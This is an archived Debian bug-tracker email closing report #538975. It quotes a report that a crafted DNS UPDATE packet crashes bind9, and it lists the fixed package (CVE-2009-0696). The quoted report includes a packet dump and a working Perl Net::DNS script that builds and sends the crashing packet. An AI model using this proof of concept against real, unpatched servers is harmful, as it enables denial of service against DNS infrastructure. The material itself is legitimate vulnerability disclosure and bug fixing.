Your message dated Wed, 29 Jul 2009 04:47:11 +0000 with message-id <e1mw14j-0006t5...@ries.debian.org> and subject line Bug#538975: fixed in bind9 1:9.6.1.dfsg.P1-1 has caused the Debian Bug report #538975, regarding bind9 dies with assertion failure (db.c:579) to be marked as done.
This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 538975: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=538975 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
--- Begin Message ---Package: bind9 Severity: normal bind can be crashed with an update packet: Packet in tcpdump: 15:38:11.676045 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto: UDP (17), length: 178) 10.2.0.205.59447 > 10.2.0.205.53: 17378 update [1a] [1n] [1au] SOA? 8.0.10.in-addr.arpa. 8.8.0.10.in-addr.arpa. ANY ns: [|domain] Another view of the Packet: | ;; HEADER SECTION | ;; id = 181 | ;; qr = 0 opcode = UPDATE rcode = NOERROR | ;; zocount = 1 prcount = 1 upcount = 1 adcount = 1 | | ;; ZONE SECTION (1 record) | ;; 8.0.10.in-addr.arpa. IN SOA | | ;; PREREQUISITE SECTION (1 record) | 4.8.0.10.in-addr.arpa. 0 IN ANY ; no data | | ;; UPDATE SECTION (1 record) | 4.8.0.10.in-addr.arpa. 0 ANY ANY ; no data | | ;; ADDITIONAL SECTION (1 record) | office.example.com. 0 ANY TSIG HMAC-MD5.SIG-ALG.REG.INT. NOERROR Such a packet can be created with perl: ----------------- #!/usr/bin/perl -w use Net::DNS; our $NSI = '<dns server>'; our $NSI_KEY_NAME = '<key name>'; our $NSI_KEY = '<key>'; my $rzone = '<zone>'; my $rptr = "1.$rzone"; my $packet = Net::DNS::Update->new($rzone); $packet->push( pre => Net::DNS::RR->new( Name => $rptr, Class => 'IN', Type => 'ANY', TTL => 0, ) ); $packet->push( update => Net::DNS::RR->new( Name => $rptr, Class => 'ANY', Type => 'ANY', ) ); $packet->sign_tsig( $NSI_KEY_NAME, $NSI_KEY ) if $NSI_KEY_NAME && $NSI_KEY; print $packet->string; Net::DNS::Resolver->new( nameservers => [$NSI] )->send($packet); -------------------- bind only crashes, if the used fqdn exists on the nameserver. -- System Information: Debian Release: 5.0.2 APT prefers proposed-updates APT policy: (500, 'proposed-updates'), (500, 'stable') Architecture: i386 (i686) Kernel: Linux 2.6.26-1-xen-686 (SMP w/1 CPU core) Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash
--- End Message ---
--- Begin Message ---Source: bind9 Source-Version: 1:9.6.1.dfsg.P1-1 We believe that the bug you reported is fixed in the latest version of bind9, which is due to be installed in the Debian FTP archive: bind9-doc_9.6.1.dfsg.P1-1_all.deb to pool/main/b/bind9/bind9-doc_9.6.1.dfsg.P1-1_all.deb bind9-host_9.6.1.dfsg.P1-1_amd64.deb to pool/main/b/bind9/bind9-host_9.6.1.dfsg.P1-1_amd64.deb bind9_9.6.1.dfsg.P1-1.diff.gz to pool/main/b/bind9/bind9_9.6.1.dfsg.P1-1.diff.gz bind9_9.6.1.dfsg.P1-1.dsc to pool/main/b/bind9/bind9_9.6.1.dfsg.P1-1.dsc bind9_9.6.1.dfsg.P1-1_amd64.deb to pool/main/b/bind9/bind9_9.6.1.dfsg.P1-1_amd64.deb bind9_9.6.1.dfsg.P1.orig.tar.gz to pool/main/b/bind9/bind9_9.6.1.dfsg.P1.orig.tar.gz bind9utils_9.6.1.dfsg.P1-1_amd64.deb to pool/main/b/bind9/bind9utils_9.6.1.dfsg.P1-1_amd64.deb dnsutils_9.6.1.dfsg.P1-1_amd64.deb to pool/main/b/bind9/dnsutils_9.6.1.dfsg.P1-1_amd64.deb libbind-dev_9.6.1.dfsg.P1-1_amd64.deb to pool/main/b/bind9/libbind-dev_9.6.1.dfsg.P1-1_amd64.deb libbind9-50_9.6.1.dfsg.P1-1_amd64.deb to pool/main/b/bind9/libbind9-50_9.6.1.dfsg.P1-1_amd64.deb libdns50_9.6.1.dfsg.P1-1_amd64.deb to pool/main/b/bind9/libdns50_9.6.1.dfsg.P1-1_amd64.deb libisc50_9.6.1.dfsg.P1-1_amd64.deb to pool/main/b/bind9/libisc50_9.6.1.dfsg.P1-1_amd64.deb libisccc50_9.6.1.dfsg.P1-1_amd64.deb to pool/main/b/bind9/libisccc50_9.6.1.dfsg.P1-1_amd64.deb libisccfg50_9.6.1.dfsg.P1-1_amd64.deb to pool/main/b/bind9/libisccfg50_9.6.1.dfsg.P1-1_amd64.deb liblwres50_9.6.1.dfsg.P1-1_amd64.deb to pool/main/b/bind9/liblwres50_9.6.1.dfsg.P1-1_amd64.deb lwresd_9.6.1.dfsg.P1-1_amd64.deb to pool/main/b/bind9/lwresd_9.6.1.dfsg.P1-1_amd64.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 538...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. LaMont Jones <lam...@debian.org> (supplier of updated bind9 package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Format: 1.7 Date: Tue, 28 Jul 2009 22:03:14 -0600 Source: bind9 Binary: bind9 bind9utils bind9-doc bind9-host libbind-dev libbind9-50 libdns50 libisc50 liblwres50 libisccc50 libisccfg50 dnsutils lwresd Architecture: all amd64 source Version: 1:9.6.1.dfsg.P1-1 Distribution: unstable Urgency: low Maintainer: LaMont Jones <lam...@debian.org> Changed-By: LaMont Jones <lam...@debian.org> Description: bind9 - Internet Domain Name Server bind9-doc - Documentation for BIND bind9-host - Version of 'host' bundled with BIND 9.X bind9utils - Utilities for BIND dnsutils - Clients provided with BIND libbind-dev - Static Libraries and Headers used by BIND libbind9-50 - BIND9 Shared Library used by BIND libdns50 - DNS Shared Library used by BIND libisc50 - ISC Shared Library used by BIND libisccc50 - Command Channel Library used by BIND libisccfg50 - Config File Handling Library used by BIND liblwres50 - Lightweight Resolver Library used by BIND lwresd - Lightweight Resolver Daemon Closes: 492308 527137 536487 538975 Changes: bind9 (1:9.6.1.dfsg.P1-1) unstable; urgency=low . [Internet Software Consortium, Inc] . * A specially crafted update packet will cause named to exit. CVE-2009-0696, CERT VU#725188. Closes: #538975 . [InterNIC] . * Update db.root hints file. . [LaMont Jones] . * Move default zone definitions from named.conf to named.conf.default-zones. Closes: #492308 * use start-stop-daemon if rndc stop fails. Closes: #536487 * lwresd: pidfile name was wrong in init script. Closes: #527137 Files: 164a8f8147ded4bbf4b0e9328f124e9f 5111118 net optional bind9_9.6.1.dfsg.P1.orig.tar.gz 43c35f13590aba2954e4610c7a02ab13 155178 net standard dnsutils_9.6.1.dfsg.P1-1_amd64.deb 527b68876b5d4595a79f9dccc549b0ba 48274 libs standard liblwres50_9.6.1.dfsg.P1-1_amd64.deb 59df9766351050f85e07c6d0726a3d2c 64734 net standard bind9-host_9.6.1.dfsg.P1-1_amd64.deb 63fff5293fdb68822b6309ca619db8ec 223042 net optional lwresd_9.6.1.dfsg.P1-1_amd64.deb 72d57c6ccc10a4cb6787450af7181759 287206 net optional bind9_9.6.1.dfsg.P1-1_amd64.deb 7b2c88cfdba22e7bac5a91e070371f61 32372 libs standard libbind9-50_9.6.1.dfsg.P1-1_amd64.deb 800a0a5ae07445bd4a7259c747feeeab 29062 libs optional libisccc50_9.6.1.dfsg.P1-1_amd64.deb 80292d564e28c966e5700846edc233f9 167044 libs standard libisc50_9.6.1.dfsg.P1-1_amd64.deb a1aec096f32ea6ec12319182c2e8b235 100246 net optional bind9utils_9.6.1.dfsg.P1-1_amd64.deb acd155f197737a2566897c6fd1ffa7a2 1403022 libdevel optional libbind-dev_9.6.1.dfsg.P1-1_amd64.deb 74243684fd7b5a713e63baf068cfaf3d 1083 net optional bind9_9.6.1.dfsg.P1-1.dsc bb587214860aacca9df33121d5ff41a1 219593 net optional bind9_9.6.1.dfsg.P1-1.diff.gz c4e0a3b5cc3e9ee37f04f951a9d4a2c0 51146 libs optional libisccfg50_9.6.1.dfsg.P1-1_amd64.deb ce7783dc0f2f7b02c35deb8e2b2cf731 280618 doc optional bind9-doc_9.6.1.dfsg.P1-1_all.deb e34ac089d6e1236532e77024e3564761 653592 libs standard libdns50_9.6.1.dfsg.P1-1_amd64.deb -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFKb84lzN/kmwoKyScRAtLgAJ9oeGH3WEVMgiSlrNISFHK2SUeuaQCeKs/g fueONBapV0I1fCnLD0AEe0w= =7Pf7 -----END PGP SIGNATURE-----
--- End Message ---
